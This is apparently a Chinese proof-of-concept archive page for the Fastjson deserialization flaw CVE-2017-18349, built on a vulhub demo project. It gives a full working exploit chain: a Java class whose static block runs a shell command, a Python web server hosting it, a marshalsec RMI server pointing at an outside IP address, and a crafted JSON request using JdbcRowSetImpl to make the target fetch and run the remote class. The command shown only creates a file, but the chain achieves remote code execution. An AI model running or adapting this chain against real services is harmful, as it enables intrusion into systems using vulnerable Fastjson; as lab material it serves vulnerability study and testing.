关联漏洞
介绍
# Fastjson--CVE-2017-18349-Cancel changes
将项目设置为一个Maven项目后执行(注意,使用高版本的JDK可能会失败,建议使用版本为1.8.65的JDK)
FastjsondemoApplication.java 的main函数即可
TouchFile.java文件
```java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"touch", "/tmp/flag_test"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
```
之后同样使用版本为8的javac编译为class文件
```bash
javac TouchFile.java
```
Python开启web服务
```bash
python -m SimpleHTTPServer 80
```
使用marshalsec生成RMIServer
```bash
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://47.99.70.18/#TouchFile" 9999
```
修改请求包
```http
POST / HTTP/1.1
Host: 127.0.0.1:8080
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://47.99.70.18:9999/TouchFile",
"autoCommit":true
}
}
```
效果: 
文件快照
[4.0K] /data/pocs/92ef409afb82b469f45886393cb518338938d49f
├── [1.5K] pom.xml
├── [1.2K] README.md
├── [4.0K] src
│ └── [4.0K] main
│ └── [4.0K] java
│ ├── [ 16M] fastjsondemo.jar
│ └── [4.0K] org
│ └── [4.0K] vulhub
│ └── [4.0K] fastjsondemo
│ ├── [1.4K] FastjsondemoApplication.java
│ ├── [1.1K] JSONController.java
│ └── [ 620] User.java
├── [ 782] TouchFile.class
└── [ 339] TouchFile.java
6 directories, 8 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。